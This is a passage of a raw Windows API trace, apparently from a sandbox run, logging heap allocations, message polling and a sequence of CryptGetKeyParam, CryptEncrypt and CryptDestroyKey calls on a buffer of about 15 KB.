hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0039.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0039.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0039.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0039.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0039.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0039.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0039.024] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0039.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0039.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0039.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0039.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0039.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0039.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0039.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0039.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0039.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0039.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0039.024] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0039.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c970 [0039.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0039.024] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0039.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0039.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0039.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0039.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0039.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0039.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0039.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0039.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0039.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0039.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0039.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0039.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0039.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0039.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0039.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0039.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0039.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0039.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0039.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0039.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0039.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0039.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0039.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0039.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0039.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0039.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0039.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0039.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0039.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0039.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0039.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0039.026] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0039.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0039.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0039.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0039.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0039.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0039.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0039.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0039.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0039.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0039.026] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0039.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0039.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0039.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0039.027] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.027] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da2b8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da2b8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0039.027] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.027] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.027] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.027] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.027] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.027] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0039.027] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.027] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.027] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0039.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0039.027] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0039.027] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.028] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0039.028] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0039.028] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0039.028] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.028] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0039.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0039.028] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.028] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0039.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0039.028] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.028] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.028] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.028] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0039.028] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.028] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.028] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0039.028] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.030] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.030] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x3c1a, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x3c20) returned 1 [0039.030] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.030] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.030] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0039.030] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.030] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.030] CharLowerBuffW (in: lpsz="byte[15393]", cchLength=0xb | out: lpsz="byte[15393]") returned 0xb [0039.031] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.031] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.031] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.031] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.031] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.031] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.031] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xacb490*, pdwDataLen=0x6ae220*=0x3c1a, dwBufLen=0x3c20 | out: pbData=0xacb490*, pdwDataLen=0x6ae220*=0x3c20) returned 1 [0039.031] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.031] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0039.032] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.032] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.032] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.032] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.032] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0039.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0039.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.032] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.032] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0039.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.032] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.032] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0039.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0039.032] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.032] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.032] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0039.032] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0039.032] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.032] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0039.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0039.033] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.033] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.033] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.033] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0039.033] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.034] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.034] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.034] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0039.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.034] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0039.034] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.034] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.034] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0039.034] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.035] CryptDestroyKey (hKey=0x7c2280) returned 1 [0039.035] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0039.035] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0039.035] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0039.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0039.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.035] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0039.035] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0039.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0039.035] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0039.035] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0039.035] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: 